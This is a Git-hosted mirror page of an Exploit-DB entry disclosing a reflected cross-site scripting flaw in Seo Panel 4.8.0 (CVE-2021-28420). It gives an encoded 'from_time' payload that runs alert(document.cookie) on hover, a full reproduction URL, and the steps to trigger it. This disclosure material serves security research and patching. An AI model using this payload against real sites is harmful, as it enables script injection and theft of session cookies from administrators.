bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/49935.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

19 lines
No EOL
709 B
Text
Raw Blame History

# Exploit Title: Seo Panel 4.8.0 - 'from_time' Reflected XSS
# Date: 23-03-2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Version: Seo Panel 4.8.0
# Tested on: Windows 10 and Kali
# CVE : CVE-2021-28420
-Description:
A cross-site scripting (XSS) issue in Seo Panel 4.8.0 allows remote
attackers to inject JavaScript via alerts.php and the "from_time" parameter.
-Payload used:
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
-Steps to reproduce:
1- Login to SEO admin panel
2- Visit: http://localhost/alerts.php?alert_category=general&from_time=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22&keyword=&to_time=2021-03-11
3- Hover your mouse to "Period" field
Reference in a new issue View git blame Copy permalink